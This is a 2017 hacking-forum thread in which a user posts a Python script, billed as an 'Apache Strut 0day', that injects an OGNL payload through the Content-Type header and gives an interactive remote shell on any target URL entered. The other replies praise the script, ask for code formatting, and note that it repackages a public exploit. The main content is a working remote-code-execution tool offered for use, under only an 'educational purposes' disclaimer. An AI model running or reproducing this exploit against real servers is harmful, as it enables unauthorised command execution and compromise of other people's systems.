Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


[Python] Apache Strut 0day #Code

  • 0 Vote(s) - 0 Average


03-17-2017, 04:25 PM #1
aerow0rm Offline Newbie **
Registered
Posts:6 Threads:3 Joined:Mar 2017 Reputation: 0
Mood: Crackhead
Code:
import urllib2
#Aero7
#GaroodaSecuritySquad
print"""
_____             _          _____ _           _      ___   _
|  _  |___ ___ ___| |_ ___   |   __| |_ ___ _ _| |_   |   |_| |___ _ _
|     | . | .'|  _|   | -_|  |__   |  _|  _| | |  _|  | | | . | .'| | |
|__|__|  _|__,|___|_|_|___|  |_____|_| |_| |___|_|    |___|___|__,|_  |
     |_|                                                         |___|
                                           x33p & X3n0x
"""
chk=raw_input('Enter URL : ')
cmd='Aero7'
while(cmd):
   cmd=raw_input('$Shell:')
   exp = "%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + " && echo Aero7').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
   req = urllib2.Request(chk, headers={'User-Agent': 'Mozilla/5.0', 'Content-Type': exp})
   con=urllib2.urlopen(req).read()
   end=con.find('Aero7')
   print con[0:end]

------------------------------------------------
[#] CodeName: Aero7
[#] Email: [email protected]

-------------------------------------------------
[Image: o8rq6s.jpg]

03-17-2017, 04:54 PM #2
1337 Offline Don't PM me for help, post it on forum ! *******
Administrators
Posts:523 Threads:106 Joined:Jun 2012 Reputation: 21
Mood: Hacker
Please copy the code and add it inside the article using the [code] tag

[Image: 28jeale.jpg]
[Image: 2mzgpld.jpg]
------------------------------------------------
[#] CodeName: 1337
[#] Email: [email protected]
[#] Zone-H: http://zone-h.org/archive/special=1/notifier=1337
[#] Facebook: https://www.facebook.com/MaDLeeTs.phtm

-------------------------------------------------

[Image: o8rq6s.jpg]

03-18-2017, 02:47 AM #3
b0l7 Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:13 Threads:1 Joined:Dec 2014 Reputation: 0
Mood: Hacker
Congrats for this 0day brother

03-21-2017, 04:03 PM #4
aerow0rm Offline Newbie **
Registered
Posts:6 Threads:3 Joined:Mar 2017 Reputation: 0
Mood: Crackhead
(03-17-2017, 04:54 PM)1337 Wrote:  Please copy the code and add it inside the article using the [code] tag

ok wink

------------------------------------------------
[#] CodeName: Aero7
[#] Email: [email protected]

-------------------------------------------------
[Image: o8rq6s.jpg]

06-14-2017, 02:56 AM #5
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
(03-18-2017, 02:47 AM)b0l7 Wrote:  Congrats for this 0day brother

he only created the python exploit :9
it got found from vex Woo (https://www.exploit-db.com/exploits/41570/)

anyway goo script wink

[Image: xodhvlpa.jpg]
[Image: test.php]






Forum Jump:


Users browsing this thread:1 Guest(s)